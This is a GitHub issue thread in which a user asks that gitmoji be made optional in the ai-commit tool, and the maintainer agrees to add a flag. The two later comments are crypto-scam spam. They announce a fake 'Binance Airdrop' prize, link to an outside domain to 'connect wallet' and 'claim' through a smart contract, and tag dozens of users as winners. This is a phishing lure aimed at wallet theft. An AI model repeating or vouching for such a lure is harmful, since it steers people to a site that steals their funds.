### ISSUE TITLE
Can we remove the gitmoji? Or make them optional?

### ISSUE THREAD

**Issue by cahaseler** [insulineru/ai-commit#9]
Great tool, but I don't understand adding emoji as a separate non-optional step when they just break compatibility with semantic-release. Can this be a flag instead?

**Comment by insulineru** [comment]
Hi. Thanks for the feedback. Sure, I'll make a flag that allows to generate commits without Gitmoji

**Comment by marisadotdev** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @liguwe, @c0rb31, @garland3, @spl33t, @W1LDN16H7, @Muzammil-shaik, @Dissocial, @GalGrigoryeva, @crazyyy, @AndrianBalanescu, @Magnum888, @Reidond, @sbruneuskaya, @eveness, @veervikrams, @0xAd3l, @ValeryKrukovich, @RyanClementsHax, @bugd0ne, @botikho, @shrpne, @khalednigrou, @UniBreakfast, @sergeyM88, @AlexeyCorr, @anroypaul, @tetenyov, @labelexe, @sandrig, @nurtechnik, @meritt, @alexfi1in, @lezin, @albychok, @TheAch, @AntonRatnick, @kmisha, @akella64, @ekeson, @GolubkovN, @zverkos, @igvars, @anna-v, @piotrlemen, @Codeblue99, @koua, @skripkaru, @D4Fi, @secorjeretweaz, @mikhailsidorov
